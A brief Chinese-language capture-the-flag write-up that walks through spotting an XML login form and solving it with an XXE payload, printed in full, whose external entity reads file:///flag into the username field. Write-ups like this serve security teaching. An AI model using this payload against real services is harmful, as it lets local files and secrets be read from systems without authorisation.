打开题目
猜测可能为sql注入,或者绕过,思路查看源码,看有用信息
试输入发现只会返回用户名错误,根据提示XML相对XXE攻击
首先进行抓包,然后构造payload。
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>123456</password></user>
直接就可以得到flag